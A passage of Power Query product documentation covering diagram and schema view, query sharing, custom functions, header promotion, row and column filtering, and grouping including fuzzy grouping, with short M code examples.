queries with multiple steps, so that you can see as many queries as possible within the
viewport.

To enable this view, navigate to diagram view settings and select Compact view inside
the View tab in the ribbon.

Show mini-map
Once the number of queries begins to overflow the diagram view, you can use the scroll
bars at the bottom and right side of the diagram view to scroll through the queries. One
other method of scrolling is to use the diagram view mini-map control. The mini-map
control lets you keep track of the overall dataflow "map", and quickly navigate, while
looking at a specific area of the map in the main diagram view area.

To open the mini-map, either select Show mini-map from the diagram view menu or
select the mini-map button in the layout options.
Right-click and hold the rectangle on the mini-map, then move the rectangle to move
around in the diagram view.

Show animations
When the Show animations menu item is selected, the transitions of the sizes and
positions of the queries are animated. These transitions are easiest to see when collapsing
or expanding the queries or when changing the dependencies of existing queries. When
cleared, the transitions will be immediate. Animations are turned on by default.

Maximize data preview


You may want to see more data within the data preview to understand and analyze the
data. To do so, expand the data preview so that you can see more data within the data
preview without leaving diagram view.

Expand or collapse all queries


By default, the queries within diagram view are collapsed. There are options to expand
or collapse each query in a single click.

You can also expand or collapse related queries from the query level context menu.

Multi-select queries
You can select multiple queries within the diagram view by holding down the Ctrl key as
you select queries. Once you multi-select, right-clicking will show a context menu that
allows you to perform operations such as merge, append, move to group, expand/collapse,
and more.

Inline rename
You can double-click the query name to rename the query.

Double-clicking the step name allows you to rename the step, provided the diagram
view setting is showing step names.

When step labels are displayed in diagram view, double-clicking the step label shows
the dialog box where you can rename the step and provide a description.
Accessibility
Diagram view supports accessibility features such as keyboard navigation, high-contrast
mode, and screen reader support. The following table describes the keyboard shortcuts
that are available within diagram view. To learn more about keyboard shortcuts available
within Power Query Online, go to keyboard shortcuts in Power Query.

Action Keyboard shortcut

Expand selected query Ctrl+Right arrow key

Collapse selected query Ctrl+Left arrow key

Move focus from query level to step level Alt+Down arrow key

Move focus from step level to query level Esc

Expand all queries Ctrl+Shift+Right arrow key

Collapse all queries Ctrl+Shift+Left arrow key

Insert new step using + button (after selected step) Ctrl+Alt+N

Highlight related queries Ctrl+Alt+R



Select all queries Ctrl+A

Copy queries Ctrl+C

Paste queries Ctrl+V


Using Schema view (Preview)
Article • 02/17/2023

Schema view is designed to optimize your flow when working on schema-level
operations by putting your query's column information front and center. Schema view
provides contextual interactions to shape your data structure, and lower-latency
operations, because it only requires the column metadata to be computed and not the
complete data results.

This article walks you through schema view and the capabilities it offers.

7 Note

The Schema view feature is available only for Power Query Online.

Overview
When working on data sets with many columns, simple tasks can become incredibly
cumbersome because even finding the right column by horizontally scrolling and
parsing through all the data is inefficient. Schema view displays your column
information in a list that's easy to parse and interact with, making it easier than ever to
work on your schema.
In addition to an optimized column management experience, another key benefit of
schema view is that transforms tend to yield results faster. These results are faster
because this view only requires the column information to be computed instead of a
preview of the data. So even long-running queries with a few columns will
benefit from using schema view.

You can turn on schema view by selecting Schema view in the View tab. When you're
ready to work on your data again, you can select Data view to go back.

Reordering columns
One common task when working on your schema is reordering columns. In schema
view, this can easily be done by dragging columns in the list and dropping them in the right
location until you achieve the desired column order.

Applying transforms
For more advanced changes to your schema, you can find the most used column-level
transforms right at your fingertips directly in the list and in the Schema tools tab. Plus,
you can also use transforms available in other tabs on the ribbon.
Share a query
Article • 12/17/2022

You can use Power Query to extract and transform data from external data sources.
These extraction and transformation steps are represented as queries. Queries created
with Power Query are expressed using the M language and executed through the M
Engine.

You can easily share and reuse your queries across projects, and also across Power
Query product integrations. This article covers the general mechanisms to share a query
in Power Query.

Copy / Paste
In the queries pane, right-click the query you want to copy. From the dropdown menu,
select the Copy option. The query and its definition will be added to your clipboard.

7 Note

The copy feature is currently not available in Power Query Online instances.
To paste the query from your clipboard, go to the queries pane and right-click on any
empty space in it. From the menu, select Paste.

When pasting this query on an instance that already has the same query name, the
pasted query will have a suffix added with the format (#), where the pound sign is
replaced with a number to distinguish the pasted queries.

You can also paste queries between multiple instances and product integrations. For
example, you can copy the query from Power BI Desktop, as shown in the previous
images, and paste it in Power Query for Excel as shown in the following image.
2 Warning

Copying and pasting queries between product integrations doesn't guarantee that
all functions and functionality found in the pasted query will work on the
destination. Some functionality might only be available in the origin product
integration.

Copy the M code


You can also copy the full code of your query.
1. Select the query that you want to share.
2. In the ribbon, select the View tab and then select Advanced Editor.
3. In the Advanced Editor window, select all the code and copy it.

With the code of your query in your clipboard, you can share this query through the
means of your choice. The recipient of this code needs to create a blank query and
follow the same steps as described above. But instead of copying the code, the recipient
will replace the code found in their blank query with the code that you provided.

7 Note

To create a blank query, go to the Get Data window and select Blank query from
the options.

Product-specific query sharing capabilities


Some Power Query product integrations might offer more ways to share queries, such as
(but not limited to):

In Microsoft Excel—Creating an Office Data Connection (.odc) to share with other users.
In Power BI Desktop—Creating a Power BI Template (.pbit) to share with other users.
We recommend that you read the documentation of the product integration that you're
interested in to learn more about the query sharing capabilities found in those products.
Using custom functions
Article • 02/17/2023

If you find yourself in a situation where you need to apply the same set of
transformations to different queries or values, creating a Power Query custom function
that can be reused as many times as you need could be beneficial. A Power Query
custom function is a mapping from a set of input values to a single output value, and is
created from native M functions and operators.
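
As a simple illustration, the following hand-written function maps one input value to one
output value; the function logic and names are only an example:

Power Query M

// A custom function that takes a price and returns the price with a 10 percent markup.
// If the query holding it is named AddMarkup, invoking AddMarkup(100) returns 110.
(price as number) as number => price * 1.1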

While you can manually create your own Power Query custom function using code as
shown in Understanding Power Query M functions, the Power Query user interface
offers you features to speed up, simplify, and enhance the process of creating and
managing a custom function.

This article focuses on this experience, provided only through the Power Query user
interface, and how to get the most out of it.

) Important

This article outlines how to create a custom function with Power Query using
common transforms accessible in the Power Query user interface. It focuses on the
core concepts to create custom functions, and links to additional articles in Power
Query documentation for more information on specific transforms that are
referenced in this article.

Create a custom function from a table


reference

7 Note

The following example was created using the desktop experience found in Power BI
Desktop and can also be followed using the Power Query experience found in Excel
for Windows.

You can follow along with this example by downloading the sample files used in this
article from the following download link . For simplicity, this article will be using the
Folder connector. To learn more about the Folder connector, go to Folder. The goal of
this example is to create a custom function that can be applied to all the files in that
folder before combining all of the data from all files into a single table.

Start by using the Folder connector experience to navigate to the folder where your files
are located and select Transform Data or Edit. This will take you to the Power Query
experience. Right-click on the Binary value of your choice from the Content field and
select the Add as New Query option. For this example, you'll see that the selection was
made for the first file from the list, which happens to be the file April 2019.csv.

This option will effectively create a new query with a navigation step directly to that file
as a Binary, and the name of this new query will be the file path of the selected file.
Rename this query to be Sample File.

Create a new parameter with the name File Parameter. Use the Sample File query as the
Current Value, as shown in the following image.
7 Note

We recommend that you read the article on Parameters to better understand how
to create and manage parameters in Power Query.

Custom functions can be created using any parameter type. There's no
requirement for any custom function to have a binary as a parameter.

The binary parameter type is only displayed inside the Parameters dialog Type
dropdown menu when you have a query that evaluates to a binary.

It's possible to create a custom function without a parameter. This is commonly
seen in scenarios where an input can be inferred from the environment where the
function is being invoked. For example, a function that takes the environment's
current date and time, and creates a specific text string from those values.
Right-click File Parameter from the Queries pane. Select the Reference option.

Rename the newly created query from File Parameter (2) to Transform Sample file.

Right-click this new Transform Sample file query and select the Create Function option.
This operation will effectively create a new function that will be linked with the
Transform Sample file query. Any changes that you make to the Transform Sample file
query will be automatically replicated to your custom function. During the creation of
this new function, use Transform file as the Function name.

After creating the function, you'll notice that a new group will be created for you with
the name of your function. This new group will contain:

All parameters that were referenced in your Transform Sample file query.
Your Transform Sample file query, commonly known as the sample query.
Your newly created function, in this case Transform file.

Applying transformations to a sample query


With your new function created, select the query with the name Transform Sample file.
This query is now linked with the Transform file function, so any changes made to this
query will be reflected in the function. This is what is known as the concept of a sample
query linked to a function.

The first transformation that needs to happen to this query is one that will interpret the
binary. You can right-click the binary from the preview pane and select the CSV option
to interpret the binary as a CSV file.
The format of all the CSV files in the folder is the same. They all have a header that
spans the top four rows. The column headers are located in row five, and the data
starts from row six downward, as shown in the next image.

The next set of transformation steps that need to be applied to the Transform Sample
file are:

1. Remove the top four rows—This action will get rid of the rows that are considered
part of the header section of the file.
7 Note

To learn more about how to remove rows or filter a table by row position, go
to Filter by row position.

2. Promote headers—The headers for your final table are now in the first row of the
table. You can promote them as shown in the next image.
Power Query by default will automatically add a new Changed Type step after
promoting your column headers that will automatically detect the data types for each
column. Your Transform Sample file query will look like the next image.
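
At this point, the code behind the Transform Sample file query looks roughly like the
following sketch. The delimiter, encoding, and detected column types shown here are
illustrative and depend on your own files:

Power Query M

let
    // Interpret the binary held by File Parameter as a CSV document.
    Source = Csv.Document(#"File Parameter", [Delimiter = ",", Encoding = 65001]),
    // Remove the four rows that make up the file's header section.
    #"Removed Top Rows" = Table.Skip(Source, 4),
    // Promote the first remaining row to be the column headers.
    #"Promoted Headers" = Table.PromoteHeaders(#"Removed Top Rows", [PromoteAllScalars = true]),
    // Power Query adds this step automatically; the columns and types shown are examples.
    #"Changed Type" = Table.TransformColumnTypes(#"Promoted Headers", {{"Date", type date}, {"Country", type text}})
in
    #"Changed Type"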

7 Note

To learn more about how to promote and demote headers, go to Promote or


demote column headers.
U Caution

Your Transform file function relies on the steps performed in the Transform
Sample file query. However, if you try to manually modify the code for the
Transform file function, you'll be greeted with a warning that reads "The definition
of the function 'Transform file' is updated whenever query 'Transform Sample
file' is updated. However, updates will stop if you directly modify function
'Transform file'."

Invoke a custom function as a new column


With the custom function now created and all the transformation steps incorporated,
you can go back to the original query where you have the list of files from the folder.
Inside the Add Column tab in the ribbon, select Invoke Custom Function from the
General group. Inside the Invoke Custom Function window, enter Output Table as the
New column name. Select the name of your function, Transform file, from the Function
query dropdown. After selecting the function from the dropdown menu, the parameter
for the function will be displayed and you can select which column from the table to use
as the argument for this function. Select the Content column as the value / argument to
be passed for the File Parameter.
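
The step created by Invoke Custom Function is roughly equivalent to the following sketch,
where the folder path is hypothetical and Source stands for the file listing returned by
the Folder connector:

Power Query M

let
    // Hypothetical folder path; Source is the table of files returned by the Folder connector.
    Source = Folder.Files("C:\SampleFiles"),
    // Invoke the custom function once per row, passing each file's Content column (a binary)
    // as the argument for File Parameter. The results land in a new Output Table column.
    #"Invoked Custom Function" = Table.AddColumn(Source, "Output Table", each #"Transform file"([Content]))
in
    #"Invoked Custom Function"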
After you select OK, a new column with the name Output Table will be created. This
column has Table values in its cells, as shown in the next image. For simplicity, remove
all columns from this table except Name and Output Table.

7 Note
To learn more about how to choose or remove columns from a table, go to Choose
or remove columns.

Your function was applied to every single row from the table using the values from the
Content column as the argument for your function. Now that the data has been
transformed into the shape that you're looking for, you can expand the Output Table
column, as shown in the image below, without using any prefix for the expanded
columns.

You can verify that you have data from all files in the folder by checking the values in the
Name or Date column. For this case, you can check the values from the Date column, as
each file only contains data for a single month from a given year. If you see more than
one, it means that you've successfully combined data from multiple files into a single
table.

7 Note
What you've read so far is fundamentally the same process that happens during the
Combine files experience, but done manually.

We recommend that you also read the article on Combine files overview and
Combine CSV files to further understand how the combine files experience works
in Power Query and the role that custom functions play.

Add new parameter to existing custom function


Imagine that there's a new requirement on top of what you've built. The new
requirement is that, before you combine the files, you filter the data inside them
to only get the rows where Country is equal to Panama.

To make this requirement happen, create a new parameter called Market with the text
data type. For the Current Value, enter the value Panama.
With this new parameter, select the Transform Sample file query and filter the Country
field using the value from the Market parameter.
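
The filter step added to the Transform Sample file query is roughly equivalent to the
following sketch, where #"Promoted Headers" stands for the previous step of that query:

Power Query M

let
    // Keep only the rows where the Country column matches the value of the Market parameter.
    #"Filtered Rows" = Table.SelectRows(#"Promoted Headers", each [Country] = Market)
in
    #"Filtered Rows"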
7 Note

To learn more about how to filter columns by values, go to Filter values.

Applying this new step to your query will automatically update the Transform file
function, which will now require two parameters based on the two parameters that your
Transform Sample file uses.

But the CSV files query has a warning sign next to it. Now that your function has been
updated, it requires two parameters. So the step where you invoke the function results
in error values, since only one of the arguments was passed to the Transform file
function during the Invoked Custom Function step.

To fix the errors, double-click Invoked Custom Function in the Applied Steps to open
the Invoke Custom Function window. In the Market parameter, manually enter the
value Panama.
You can now check your query to validate that only rows where Country is equal to
Panama show up in the final result set of the CSV Files query.

Create a custom function from a reusable piece


of logic
If you have multiple queries or values that require the same set of transformations, you
could create a custom function that acts as a reusable piece of logic. Later, this custom
function can be invoked against the queries or values of your choice. This custom
function could save you time and help you in managing your set of transformations in a
central location, which you can modify at any moment.

For example, imagine a query that has several codes as a text string and you want to
create a function that will decode those values, as in the following sample table:

code

PTY-CM1090-LAX

LAX-CM701-PTY

PTY-CM4441-MIA

MIA-UA1257-LAX

LAX-XY2842-MIA

You start by having a parameter that has a value that serves as an example. For this case,
it will be the value PTY-CM1090-LAX.
From that parameter, you create a new query where you apply the transformations that
you need. For this case, you want to split the code PTY-CM1090-LAX into multiple
components:

Origin = PTY
Destination = LAX
Airline = CM
FlightID = 1090
The M code for that set of transformations is shown below.

Power Query M

let
    Source = code,
    SplitValues = Text.Split(Source, "-"),
    CreateRow = [
        Origin = SplitValues{0},
        Destination = SplitValues{2},
        Airline = Text.Start(SplitValues{1}, 2),
        FlightID = Text.End(SplitValues{1}, Text.Length(SplitValues{1}) - 2)
    ],
    RowToTable = Table.FromRecords({CreateRow}),
    #"Changed Type" = Table.TransformColumnTypes(RowToTable, {{"Origin", type text}, {"Destination", type text}, {"Airline", type text}, {"FlightID", type text}})
in
    #"Changed Type"

7 Note

To learn more about the Power Query M formula language, go to Power Query M
formula language.

You can then transform that query into a function by right-clicking the query
and selecting Create Function. Finally, you can invoke your custom function against any of
your queries or values, as shown in the next image.
After a few more transformations, you can see that you've reached your desired output
and leveraged the logic for such a transformation from a custom function.


Promote or demote column headers
Article • 12/17/2022

When creating a new query from unstructured data sources such as text files, Power
Query analyzes the contents of the file. If Power Query identifies a different pattern for
the first row, it will try to promote the first row of data to be the column headings for
your table. However, Power Query might not identify the pattern correctly 100 percent
of the time, so this article explains how you can manually promote or demote column
headers from rows.

To promote rows to column headers


In the following example, Power Query wasn't able to determine the column headers for
the table because the table contains a set of header rows for the first three rows. The
actual column headers for the table are contained in row 5.

Before you can promote the headers, you need to remove the first four rows of the
table. To make that happen, select the table menu in the upper-left corner of the
preview window, and then select Remove top rows.
In the Remove top rows window, enter 4 in the Number of rows box.

7 Note

To learn more about Remove top rows and other table operations, go to Filter by
row position.

The result of that operation will leave the headers as the first row of your table.
Locations of the promote headers operation
From here, you have a number of places where you can select the promote headers
operation:

On the Home tab, in the Transform group.

On the Transform tab, in the Table group.

On the table menu.


After you do the promote headers operation, your table will look like the following
image.
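
In M, the two operations used in this example correspond to Table.Skip and
Table.PromoteHeaders; Table.DemoteHeaders performs the opposite operation. A minimal
sketch, where Source stands for the previous step:

Power Query M

let
    // Remove the first four rows that make up the report header.
    #"Removed Top Rows" = Table.Skip(Source, 4),
    // Use what is now the first row of the table as the column headers.
    #"Promoted Headers" = Table.PromoteHeaders(#"Removed Top Rows", [PromoteAllScalars = true])
in
    #"Promoted Headers"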

7 Note

Table column names must be unique. If the row you want to promote to a header
row contains multiple instances of the same text string, Power Query will
disambiguate the column headings by adding a numeric suffix preceded by a dot
to every text string that isn't unique.
To demote column headers to rows
In the following example, the column headers are incorrect: they're actually part of the
table's data. You need to demote the headers to be part of the rows of the table.

Locations of the demote headers operation


You have a number of places where you can select the demote headers operation:

On the Home tab, in the Transform group.

On the Transform tab, in the Table group.

After you do this operation, your table will look like the following image.
As a last step, select each column and type a new name for it. The end result will
resemble the following image.

See also
Filter by row position
Filter a table by row position
Article • 12/17/2022

Power Query has multiple options to filter a table based on the positions of its rows,
either by keeping or removing those rows. This article covers all the available methods.

Keep rows
The keep rows set of functions will select a set of rows from the table and remove any
other rows that don't meet the criteria.

There are two places where you can find the Keep rows buttons:

On the Home tab, in the Reduce Rows group.

On the table menu.


7 Note

In the data preview section in the middle of the Power Query window, you can see
the position of your rows on the left side of the table. Each row position is
represented by a number. The top row starts with position 1.

Keep top rows


Imagine the following table that comes out of a system with a fixed layout.
This report always contains seven rows of data, and below the data it has a section for
comments with an unknown number of rows. In this example, you only want to keep the
first seven rows of data. To do that, select Keep top rows from the table menu. In the
Keep top rows dialog box, enter 7 in the Number of rows box.

The result of that change will give you the output table you're looking for. After you set
the data types for your columns, your table will look like the following image.
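
In M, Keep top rows corresponds to Table.FirstN; the related commands Keep bottom rows and
Keep range of rows correspond to Table.LastN and Table.Range. A minimal sketch for this
example, where Source stands for the previous step:

Power Query M

let
    // Keep only the first seven rows of the table; every row below them is removed.
    #"Kept First Rows" = Table.FirstN(Source, 7)
in
    #"Kept First Rows"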
Keep bottom rows
Imagine the following table that comes out of a system with a fixed layout.

This report always contains seven rows of data at the end of the report page. Above the
data, the report has a section for comments with an unknown number of rows. In this
example, you only want to keep those last seven rows of data and the header row.

To do that, select Keep bottom rows from the table menu. In the Keep bottom rows
dialog box, enter 8 in the Number of rows box.
The result of that operation will give you eight rows, but now your header row is part of
the table.

You need to promote the column headers from the first row of your table. To do this,
select Use first row as headers from the table menu. After you define data types for
your columns, you'll create a table that looks like the following image.

More information: Promote or demote column headers

Keep a range of rows


Imagine the following table that comes out of a system with a fixed layout.
This report always contains five rows for the header, one row of column headers below
the header, seven rows of data below the column headers, and then an unknown
number of rows for its comments section. In this example, you want to get the eight
rows after the header section of the report, and only those eight rows.

To do that, select Keep range of rows from the table menu. In the Keep range of rows
dialog box, enter 6 in the First row box and 8 in the Number of rows box.

Similar to the previous example for keeping bottom rows, the result of this operation
gives you eight rows with your column headers as part of the table. Any rows above the
First row that you defined (row 6) are removed.
You can perform the same operation as described in Keep bottom rows to promote the
column headers from the first row of your table. After you set data types for your
columns, your table will look like the following image.

Remove rows
This set of functions will select a set of rows from the table, remove them, and keep the
rest of the rows in the table.

There are two places where you can find the Remove rows buttons:

On the Home tab, in the Reduce Rows group.

On the table menu.


Remove top rows
Imagine the following table that comes out of a system with a fixed layout.
This report always contains a fixed header from row 1 to row 5 of the table. In this
example, you want to remove these first five rows and keep the rest of the data.

To do that, select Remove top rows from the table menu. In the Remove top rows
dialog box, enter 5 in the Number of rows box.

In the same way as the previous examples for "Keep bottom rows" and "Keep a range of
rows," the result of this operation gives you eight rows with your column headers as part
of the table.

You can perform the same operation as described in previous examples to promote the
column headers from the first row of your table. After you set data types for your
columns, your table will look like the following image.
Remove bottom rows
Imagine the following table that comes out of a system with a fixed layout.

This report always contains a fixed section or footer that occupies the last five rows of
the table. In this example, you want to remove those last five rows and keep the rest of
the data.

To do that, select Remove bottom rows from the table menu. In the Remove bottom rows
dialog box, enter 5 in the Number of rows box.

The result of that change will give you the output table that you're looking for. After you
set data types for your columns, your table will look like the following image.
Remove alternate rows
Imagine the following table that comes out of a system with a dynamic layout.

The way this report is structured is that you have elements in pairs of rows. Every odd
row (1, 3, 5...) contains the data that you need. Every even row, directly underneath each
odd row, contains comments about each of those records. You don't need the
comments, and you want to remove all of them.

To do that, select Remove alternate rows from the table menu. In the Remove alternate
rows dialog box, enter the following values:

In the First row to remove box, enter 2.


You want to start counting from the second row. Any rows above this First row to
remove will be kept.

In the Number of rows to remove box, enter 1.

Here you start defining the pattern for removing rows. After you find the second
row, you only want to remove that specific row, so you specify that you only need
to remove one row.

In the Number of rows to keep box, enter 1.

After you remove one row, you keep the next row. The process starts again for the
next row.

The result of that selection will give you the output table that you're looking for. After
you set the data types to your columns, your table will look like the following image.
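
Behind the scenes, this command corresponds to Table.AlternateRows. A minimal sketch for the
values used above, where Source stands for the previous step:

Power Query M

let
    // An offset of 1 keeps the first row; then the pattern repeats: remove 1 row, keep 1 row.
    #"Removed Alternate Rows" = Table.AlternateRows(Source, 1, 1, 1)
in
    #"Removed Alternate Rows"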
Filter by values in a column
Article • 12/17/2022

In Power Query, you can include or exclude rows according to a specific value in a
column. You can choose from three methods to filter the values in your column:

Sort and filter menu


Cell shortcut menu
Type-specific filter

After you apply a filter to a column, a small filter icon appears in the column heading, as
shown in the following illustration.

Sort and filter menu


In the column header, you'll see an icon with an inverse triangle. When you select this
icon, the sort and filter menu is displayed. With this menu, you can apply or remove any
filters to or from your column.
7 Note

In this article, we'll focus on aspects related to filtering data. To learn more about
the sort options and how to sort columns in Power Query, go to Sort columns.

Remove empty
The Remove empty command applies two filter rules to your column. The first rule gets
rid of any null values. The second rule gets rid of any blank values. For example, imagine
a table with just one text column with five rows, where you have one null value and one
blank cell.
7 Note

A null value is a specific value in the Power Query language that represents no
value.

You then select Remove empty from the sort and filter menu, as shown in the following
image.

You can also select this option from the Home tab in the Reduce Rows group in the
Remove Rows drop-down options, as shown in the next image.
The result of the Remove empty operation gives you the same table without the empty
values.

Clear filter
When a filter is applied to a column, the Clear filter command appears on the sort and
filter menu.
Auto filter
The list in the sort and filter menu is called the auto filter list, which shows the unique
values in your column. You can manually select or deselect which values to include in the
list. Any selected values will be taken into consideration by the filter; any values that
aren't selected will be ignored.

This auto filter section also has a search bar to help you find any values from your list.
7 Note

When you load the auto filter list, only the top 1,000 distinct values in the column
are loaded. If there are more than 1,000 distinct values in the column that
you're filtering, a message will appear indicating that the list of values in the filter
list might be incomplete, and the Load more link appears. Select the Load more
link to load another 1,000 distinct values.

If exactly 1,000 distinct values are found again, the list is displayed with a
message stating that the list might still be incomplete.
If fewer than 1,000 distinct values are found, the full list of values is shown.

Cell shortcut menu


You can right-click a particular cell in a column to open the shortcut menu for that value.
Point to the small filter icon, and then select the filter option you want to use.
7 Note

Power Query displays a type-specific filter based on the data type of the column.

Type-specific filters
Depending on the data type of your column, you'll see different commands in the sort
and filter menu. The following images show examples for date, text, and numeric
columns.
Filter rows
When selecting any of the type-specific filters, you'll use the Filter rows dialog box to
specify filter rules for the column. This dialog box is shown in the following image.

The Filter rows dialog box has two modes: Basic and Advanced.

Basic

With basic mode, you can implement up to two filter rules based on type-specific filters.
In the preceding image, notice that the name of the selected column is displayed after
the label Keep rows where, to let you know which column these filter rules are being
implemented on.
For example, imagine that in the following table, you want to filter the Account Code by
all values that start with either PA or PTY.

To do that, you can go to the Filter rows dialog box for the Account Code column and
specify the set of filter rules you want.

In this example, first select the Basic button. Then under Keep rows where "Account
Code", select begins with, and then enter PA. Then select the or button. Under the or
button, select begins with, and then enter PTY. Then select OK.

The result of that operation will give you the set of rows that you're looking for.
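
The filter rules defined in this example correspond roughly to the following M sketch, where
Source stands for the previous step:

Power Query M

let
    // Keep only the rows where Account Code begins with "PA" or begins with "PTY".
    #"Filtered Rows" = Table.SelectRows(Source, each Text.StartsWith([Account Code], "PA") or Text.StartsWith([Account Code], "PTY"))
in
    #"Filtered Rows"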

Advanced
With advanced mode, you can implement as many type-specific filters as necessary from
all the columns in the table.

For example, imagine that instead of applying the previous filter in basic mode, you
wanted to implement a filter to Account Code to show all values that end with 4. Also,
you want to show values over $100 in the Sales column.

In this example, first select the Advanced button. In the first row, select Account Code
under Column name, ends with under Operator, and select 4 for the Value. In the
second row, select and, and then select Sales under Column Name, is greater than
under Operator, and 100 under Value. Then select OK.

The result of that operation will give you just one row that meets both criteria.

7 Note

You can add as many clauses as you'd like by selecting Add clause. All clauses act
at the same level, so you might want to consider creating multiple filter steps if you
need to implement filters that rely on other filters.
Choose or remove columns
Article • 12/17/2022

Choose columns and Remove columns are operations that help you define what
columns your table needs to keep and which ones it needs to remove. This article will
showcase how to use the Choose columns and Remove columns commands by using
the following sample table for both operations.

The goal is to create a table that looks like the following image.

Choose columns
On the Home tab, in the Manage columns group, select Choose columns.

The Choose columns dialog box appears, containing all the available columns in your
table. You can select all the fields that you want to keep and remove specific fields by
clearing their associated check box. For this example, you want to remove the GUID and
Report created by columns, so you clear the check boxes for those fields.
After selecting OK, you'll create a table that only contains the Date, Product,
SalesPerson, and Units columns.
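
In M, Choose columns corresponds to Table.SelectColumns (and Remove columns to
Table.RemoveColumns). A minimal sketch for this example, where Source stands for the
previous step:

Power Query M

let
    // Keep only the listed columns; all other columns are removed from the table.
    #"Chosen Columns" = Table.SelectColumns(Source, {"Date", "Product", "SalesPerson", "Units"})
in
    #"Chosen Columns"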

Remove columns
When you select Remove columns from the Home tab, you have two options:

Remove columns: Removes the selected columns.


Remove other columns: Removes all columns from the table except the selected
ones.
Remove selected columns
Starting from the sample table, select the GUID and the Report created by columns.
Right-click any of the selected column headings. A shortcut menu appears, where you
can select the Remove columns command.

After selecting Remove columns, you'll create a table that only contains the Date,
Product, SalesPerson, and Units columns.

Remove other columns


Starting from the sample table, select all the columns from the table except GUID and
Report created. On the Home tab, select Remove columns > Remove other columns.
After selecting Remove other columns, you'll create a table that only contains the Date,
Product, SalesPerson, and Units columns.
Grouping or summarizing rows
Article • 03/21/2023

In Power Query, you can group values in various rows into a single value by grouping
the rows according to the values in one or more columns. You can choose from two
types of grouping operations:

Column groupings.

Row groupings.

For this tutorial, you'll be using the following sample table.

Where to find the Group by button


You can find the Group by button in three places:

On the Home tab, in the Transform group.

On the Transform tab, in the Table group.


On the shortcut menu when you right-click to select columns.

Use an aggregate function to group by one or


more columns
In this example, your goal is to summarize the total units sold at the country and sales
channel level. You'll use the Country and Sales Channel columns to perform the group
by operation.

1. Select Group by on the Home tab.


2. Select the Advanced option, so you can select multiple columns to group by.
3. Select the Country column.
4. Select Add grouping.
5. Select the Sales Channel column.
6. In New column name, enter Total units, in Operation, select Sum, and in Column,
select Units.
7. Select OK
This operation gives you the following table.
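
The group-by operation in this example corresponds roughly to the following M sketch, where
Source stands for the previous step:

Power Query M

let
    // Group by Country and Sales Channel, and sum the Units column into a new Total units column.
    #"Grouped Rows" = Table.Group(Source, {"Country", "Sales Channel"}, {{"Total units", each List.Sum([Units]), type nullable number}})
in
    #"Grouped Rows"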

Operations available
With the Group by feature, the available operations can be categorized in two ways:

Row level operation


Column level operation

The following table describes each of these operations.

Operation name - Category - Description

Sum - Column operation - Sums up all values from a column
Average - Column operation - Calculates the average value from a column
Median - Column operation - Calculates the median from a column
Min - Column operation - Calculates the minimum value from a column
Max - Column operation - Calculates the maximum value from a column
Percentile - Column operation - Calculates the percentile, using an input value from 0 to 100, from a column
Count distinct values - Column operation - Calculates the number of distinct values from a column
Count rows - Row operation - Calculates the total number of rows from a given group
Count distinct rows - Row operation - Calculates the number of distinct rows from a given group
All rows - Row operation - Outputs all grouped rows in a table value with no aggregations

7 Note

The Count distinct values and Percentile operations are only available in Power
Query Online.

Perform an operation to group by one or more


columns
Starting from the original sample, in this example you'll create a column containing the
total units and two other columns that give you the name and units sold for the top-
performing product, summarized at the country and sales channel level.
1. Use the following columns as Group by columns:

Country
Sales Channel

2. Create two new columns by following these steps:


a. Aggregate the Units column by using the Sum operation. Name this column
Total units.
b. Add a new Products column by using the All rows operation.

After that operation is complete, notice how the Products column has [Table] values
inside each cell. Each [Table] value contains all the rows that were grouped by the
Country and Sales Channel columns from your original table. You can select the white
space inside the cell to see a preview of the contents of the table at the bottom of the
dialog box.
7 Note

The details preview pane might not show all the rows that were used for the group-
by operation. You can select the [Table] value to see all rows pertaining to the
corresponding group-by operation.

Next, you need to extract the row that has the highest value in the Units column of the
tables inside the new Products column, and call that new column Top performer
product.

Extract the top performer product information


With the new Products column with [Table] values, you create a new custom column by
going to the Add Column tab on the ribbon and selecting Custom column from the
General group.

Name your new column Top performer product. Enter the formula
Table.Max([Products], "Units" ) under Custom column formula.
The result of that formula creates a new column with [Record] values. These record
values are essentially a table with just one row. These records contain the row with the
maximum value for the Units column of each [Table] value in the Products column.

With this new Top performer product column that contains [Record] values, you can
select the expand icon, select the Product and Units fields, and then select OK.
After removing your Products column and setting the data type for both newly
expanded columns, your result will resemble the following image.

Fuzzy grouping

7 Note

The following feature is only available in Power Query Online.

To demonstrate how to do "fuzzy grouping," consider the sample table shown in the
following image.
The goal of fuzzy grouping is to do a group-by operation that uses an approximate
match algorithm for text strings. Power Query uses the Jaccard similarity algorithm to
measure the similarity between pairs of instances. Then it applies agglomerative
hierarchical clustering to group instances together. The following image shows the
output that you expect, where the table will be grouped by the Person column.

To do the fuzzy grouping, you perform the same steps previously described in this
article. The only difference is that this time, in the Group by dialog box, you select the
Use fuzzy grouping check box.
For each group of rows, Power Query will pick the most frequent instance as the
"canonical" instance. If multiple instances occur with the same frequency, Power Query
will pick the first one. After you select OK in the Group by dialog box, you'll get the
result that you were expecting.

However, you have more control over the fuzzy grouping operation by expanding Fuzzy
group options.
The following options are available for fuzzy grouping:

Similarity threshold (optional): This option indicates how similar two values must
be to be grouped together. The minimum setting of 0 will cause all values to be
grouped together. The maximum setting of 1 will only allow values that match
exactly to be grouped together. The default is 0.8.
Ignore case: When comparing text strings, case will be ignored. This option is
enabled by default.
Group by combining text parts: The algorithm will try to combine text parts (such
as combining Micro and soft into Microsoft) to group values.
Show similarity scores: Show similarity scores between the input values and the
computed representative values after fuzzy grouping. Requires the addition of an
operation such as All rows to showcase this information on a row-by-row level.
Transformation table (optional): You can select a transformation table that will
map values (such as mapping MSFT to Microsoft) to group them together.

For this example, a transformation table will be used to demonstrate how values can be
mapped. The transformation table has two columns:

From: The text string to look for in your table.


To: The text string to use to replace the text string in the From column.
The following image shows the transformation table used in this example.

) Important

It's important that the transformation table has the same columns and column
names as shown above (they have to be "From" and "To"); otherwise, Power Query
won't recognize them.

Return to the Group by dialog box, expand Fuzzy group options, change the operation
from Count rows to All rows, enable the Show similarity scores option, and then select
the Transformation table drop-down menu.

After you select the transformation table, select OK. The result of that operation gives
you the following information:
In this example, the Ignore case option was enabled, so the values in the From column
of the Transformation table are used to look for the text string without considering the
case of the string. This transformation operation occurs first, and then the fuzzy
grouping operation is performed.

The similarity score is also shown in the table value next to the person column, which
reflects exactly how the values were grouped and their respective similarity scores. You
can expand this column if needed or use the values from the new Frequency columns
for other sorts of transformations.

7 Note

When grouping by multiple columns, the transformation table performs the replace
operation in all columns if replacing the value increases the similarity score.

See also
Add a custom column
Remove duplicates
Unpivot columns
Article • 12/17/2022

In Power Query, you can transform columns into attribute-value pairs, where columns
become rows.

For example, given a table like the following, where country rows and date columns
